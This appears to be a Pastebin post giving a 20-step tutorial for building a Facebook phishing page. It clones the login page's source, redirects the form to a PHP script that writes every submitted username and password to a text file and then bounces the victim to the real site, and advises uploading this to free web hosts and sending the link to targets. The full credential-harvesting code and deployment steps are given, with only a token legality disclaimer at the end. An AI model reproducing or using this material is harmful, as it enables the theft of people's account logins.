Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- How to create a phishing site - An0nGh05tP5ych0
- 1) Goto facebook and right click on the page it should say view page source, click on that.
- 2) Now a new tab will open containing open source code, select all the code and paste it into notepad or wordpad.
- 3) Now press CTRL+F, and type action.
- 4) You will now find a text which says. "action="https://www.facebook.com/login.php?login attempt=1"
- 5) Delete all the text written in red colour and instead of it write post.php then it will look like action=post.php
- 6) Now save the file and name it index.htm not html.
- 7) Now your page is ready it should look like a blank page with a browser logo on it.
- 8) Open a new notepad and save the given data with the name post.php
- <?php
- header ('Location:http://www.facebook.com/');
- $handle = fopen("usernames.txt", "a");
- foreach($_POST as $variable => $value) {
- fwrite($handle, $variable);
- fwrite($handle, "=");
- fwrite($handle, $value);
- fwrite($handle, "\r\n");
- }
- fwrite($handle, "\r\n");
- fclose($handle);
- exit;
- ?>
- 9) You now have two files one is index.htm and another is post.php, remember the extensions are important.
- 10) Now you need to upload it to a webhosting site, I use www.000webhost.com or if I can't www.my3gb.com
- 11) I prefer to use www.000webhost.com as it's alot easier than everything else.
- 12) You have to make an account in that.
- 13) Now goto control panel, then goto file manager.
- 14) After that a new window will appear goto public_html.
- 15) Delete the file named default.php after that upload two files index.htm and post.php one by one.
- 16) Now the last step click on view of index.htm it will look the same as the facebook page.
- 17) Copy the url of the page and send it to someone.
- 18) When they log in they will be re-directed back to the normal facebook page.
- 19) Now goto file manager and public_html and there will be a new file named username.txt.
- 20) This will contain the login information.
- NOTE: Phishing is illegal, do this at your own risk.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement